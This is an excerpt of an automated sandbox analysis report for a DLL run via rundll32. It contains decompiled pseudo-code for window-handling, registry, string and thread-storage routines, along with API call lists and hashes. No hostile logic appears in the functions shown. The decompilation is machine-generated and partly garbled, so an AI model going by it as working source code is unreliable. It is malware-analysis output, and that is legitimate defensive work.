								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}












                                                                        0x10037735
                                                                        0x10037739
                                                                        0x1003773b
                                                                        0x1003773b
                                                                        0x1003773f
                                                                        0x10037742
                                                                        0x10037748
                                                                        0x1003774f
                                                                        0x1003782b
                                                                        0x1003782c
                                                                        0x10037755
                                                                        0x10037755
                                                                        0x10037758
                                                                        0x00000000
                                                                        0x1003775e
                                                                        0x10037766
                                                                        0x1003776a
                                                                        0x1003778c
                                                                        0x10037799
                                                                        0x1003778e
                                                                        0x10037795
                                                                        0x10037795
                                                                        0x1003779b
                                                                        0x1003779e
                                                                        0x100377a1
                                                                        0x100377a1
                                                                        0x100377a4
                                                                        0x100377a7
                                                                        0x100377aa
                                                                        0x00000000
                                                                        0x1003776c
                                                                        0x1003776c
                                                                        0x10037772
                                                                        0x100377ad
                                                                        0x100377ad
                                                                        0x100377b2
                                                                        0x100377c4
                                                                        0x100377c9
                                                                        0x100377ce
                                                                        0x100377b4
                                                                        0x100377b4
                                                                        0x100377bc
                                                                        0x100377bc
                                                                        0x100377d6
                                                                        0x100377db
                                                                        0x100377e1
                                                                        0x100377e1
                                                                        0x100377e9
                                                                        0x100377ec
                                                                        0x100377fa
                                                                        0x100377ff
                                                                        0x10037806
                                                                        0x1003780b
                                                                        0x10037811
                                                                        0x10037811
                                                                        0x10037772
                                                                        0x10037814
                                                                        0x10037819
                                                                        0x10037823
                                                                        0x10037823
                                                                        0x1003782c
                                                                        0x1003782c
                                                                        0x10037758
                                                                        0x10037836

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                        • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                        • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                        • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                        • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                        • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                        • String ID:
                                                                        • API String ID: 784703316-0
                                                                        • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                        • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000F6EA Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E1000F6EA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E100203CE(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000F6EA(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}












                                                                        0x1000f6ea
                                                                        0x1000f6ea
                                                                        0x1000f6ec
                                                                        0x1000f6f3
                                                                        0x1000f793
                                                                        0x1000f797
                                                                        0x1000f7a6
                                                                        0x1000f7aa
                                                                        0x1000f755
                                                                        0x1000f765
                                                                        0x1000f7bc
                                                                        0x00000000
                                                                        0x1000f7bc
                                                                        0x1000f767
                                                                        0x1000f768
                                                                        0x1000f76f
                                                                        0x1000f781
                                                                        0x1000f7b0
                                                                        0x1000f7b0
                                                                        0x1000f7b1
                                                                        0x1000f7b3
                                                                        0x00000000
                                                                        0x1000f7b3
                                                                        0x1000f783
                                                                        0x1000f78c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f78e
                                                                        0x1000f78e
                                                                        0x1000f78e
                                                                        0x1000f78f
                                                                        0x1000f790
                                                                        0x1000f7b4
                                                                        0x1000f7b9
                                                                        0x00000000
                                                                        0x1000f7bb
                                                                        0x1000f76f
                                                                        0x00000000
                                                                        0x1000f7ac
                                                                        0x1000f708
                                                                        0x1000f70d
                                                                        0x1000f741
                                                                        0x1000f729
                                                                        0x1000f72d
                                                                        0x00000000
                                                                        0x1000f733
                                                                        0x1000f73c
                                                                        0x00000000
                                                                        0x1000f73c
                                                                        0x1000f72d
                                                                        0x1000f753
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentVisible
                                                                        • String ID:
                                                                        • API String ID: 506644340-0
                                                                        • Opcode ID: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                        • Opcode Fuzzy Hash: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024AA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t21;
				CHAR* _t22;
				int _t31;
				CHAR* _t33;
				intOrPtr _t35;
				CHAR* _t40;
				void* _t44;
				void* _t47;

				_t40 = _a4;
				_t31 = lstrlenA(_t40);
				_t21 = E10038481(_t40, 0, 0) - 1;
				_t44 = _t31 - _t21;
				_t35 = _t44 + _t40;
				_a4 = _t21;
				_v8 = _t35;
				if(_a8 < _t31) {
					if(_a8 >= _t21) {
						_t33 =  &(_t40[2]);
						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
							while( *_t33 != 0x5c) {
								_t33 = E100127D1(_t33);
							}
						}
						if(_t44 > 3) {
							do {
								_t33 = E100127D1(_t33);
							} while ( *_t33 != 0x5c);
						}
						_t22 = _a4;
						_t47 = _t33 - _t40;
						_t12 =  &(_t22[5]); // 0x5
						if(_a8 >= _t47 + _t12) {
							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
								do {
									_t33 = E100127D1(_t33);
								} while ( *_t33 != 0x5c);
							}
							 *((char*)(_t47 + _t40)) = 0;
							lstrcatA(_t40, "\\...");
							_t21 = lstrcatA(_t40, _t33);
						} else {
							_push(_v8);
							goto L14;
						}
					} else {
						if(_a12 == 0) {
							_t35 = 0x1003da51;
						}
						_push(_t35);
						L14:
						_t21 = lstrcpyA(_t40, ??);
					}
				}
				return _t21;
			}












                                                                        0x10024aa8
                                                                        0x10024ab7
                                                                        0x10024abe
                                                                        0x10024ac1
                                                                        0x10024ac6
                                                                        0x10024ac9
                                                                        0x10024acc
                                                                        0x10024acf
                                                                        0x10024ad8
                                                                        0x10024aeb
                                                                        0x10024aee
                                                                        0x10024b01
                                                                        0x10024aff
                                                                        0x10024aff
                                                                        0x10024b01
                                                                        0x10024b09
                                                                        0x10024b0b
                                                                        0x10024b11
                                                                        0x10024b16
                                                                        0x10024b0b
                                                                        0x10024b19
                                                                        0x10024b1e
                                                                        0x10024b20
                                                                        0x10024b27
                                                                        0x10024b43
                                                                        0x10024b35
                                                                        0x10024b3b
                                                                        0x10024b40
                                                                        0x10024b35
                                                                        0x10024b58
                                                                        0x10024b63
                                                                        0x10024b67
                                                                        0x10024b29
                                                                        0x10024b29
                                                                        0x00000000
                                                                        0x10024b29
                                                                        0x10024ada
                                                                        0x10024ade
                                                                        0x10024ae0
                                                                        0x10024ae0
                                                                        0x10024ae5
                                                                        0x10024b2c
                                                                        0x10024b2d
                                                                        0x10024b2d
                                                                        0x10024ad8
                                                                        0x10024b6d

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                          • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                        • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                        • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                        • String ID: \...
                                                                        • API String ID: 1604900594-1167917071
                                                                        • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                        • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100304C6 Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E100304C6(void* __ecx) {
				struct tagMSG _v28;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					if(_t21 != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E100220EE(_t40, GetDesktopWindow());
				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
				_t33 = E10029068();
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}











                                                                        0x100304d5
                                                                        0x100304d8
                                                                        0x100304da
                                                                        0x100304ff
                                                                        0x100304e5
                                                                        0x100304ed
                                                                        0x100304f8
                                                                        0x100304fe
                                                                        0x00000000
                                                                        0x100304fe
                                                                        0x10030581
                                                                        0x10030581
                                                                        0x1003050d
                                                                        0x10030516
                                                                        0x10030521
                                                                        0x10030528
                                                                        0x1003052e
                                                                        0x10030531
                                                                        0x10030534
                                                                        0x10030537
                                                                        0x1003053a
                                                                        0x1003054c
                                                                        0x10030559
                                                                        0x10030562
                                                                        0x1003055b
                                                                        0x1003055b
                                                                        0x1003055b
                                                                        0x1003056e
                                                                        0x1003056f
                                                                        0x10030574
                                                                        0x00000000

                                                                        APIs
                                                                        • GetMessageA.USER32 ref: 100304E5
                                                                        • DispatchMessageA.USER32 ref: 100304F8
                                                                        • PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                        • SetRectEmpty.USER32(?), ref: 10030528
                                                                        • GetDesktopWindow.USER32 ref: 10030540
                                                                        • LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                        • GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                        • String ID:
                                                                        • API String ID: 1192691108-0
                                                                        • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                        • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100358C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100358C8(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                        0x100358e3
                                                                        0x100358ea
                                                                        0x100358ed
                                                                        0x100358f0
                                                                        0x100358f3
                                                                        0x100358fe
                                                                        0x10035935
                                                                        0x10035935
                                                                        0x10035940
                                                                        0x10035945
                                                                        0x10035945
                                                                        0x1003594a
                                                                        0x1003594f
                                                                        0x1003594f
                                                                        0x10035958

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                        • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate$Open
                                                                        • String ID: software
                                                                        • API String ID: 1740278721-2010147023
                                                                        • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                        • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10007B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E1000799F() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1004ee08(_a4, _a8);
			}







                                                                        0x10007b5d
                                                                        0x10007b76
                                                                        0x10007bdd
                                                                        0x10007bdd
                                                                        0x10007bdf
                                                                        0x00000000
                                                                        0x10007be0
                                                                        0x10007b78
                                                                        0x10007b7f
                                                                        0x00000000
                                                                        0x10007b98
                                                                        0x10007b99
                                                                        0x10007b9c
                                                                        0x10007baa
                                                                        0x10007bad
                                                                        0x10007bb5
                                                                        0x10007bb6
                                                                        0x10007bb7
                                                                        0x10007bb8
                                                                        0x10007bbf
                                                                        0x10007bc2
                                                                        0x10007bc6
                                                                        0x10007bd3
                                                                        0x10007bd3
                                                                        0x10007bd9
                                                                        0x00000000
                                                                        0x10007bd9
                                                                        0x10007b7f
                                                                        0x00000000

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                        • GetSystemMetrics.USER32 ref: 10007BA6
                                                                        • GetSystemMetrics.USER32 ref: 10007BAD
                                                                        • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                        • String ID: B$DISPLAY
                                                                        • API String ID: 2307409384-3316187204
                                                                        • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                        • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10020D81 Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10020D8D
                                                                        • GetWindowRect.USER32 ref: 10020DA8
                                                                        • ScreenToClient.USER32 ref: 10020DBB
                                                                        • ScreenToClient.USER32 ref: 10020DC4
                                                                        • EqualRect.USER32 ref: 10020DCE
                                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                        • String ID:
                                                                        • API String ID: 443303494-0
                                                                        • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                        • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000ECE8 Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E10011BF0(0x1003b04c, _t327);
				_t155 =  *0x1004c470; // 0x1bfbe703
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E10010592(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
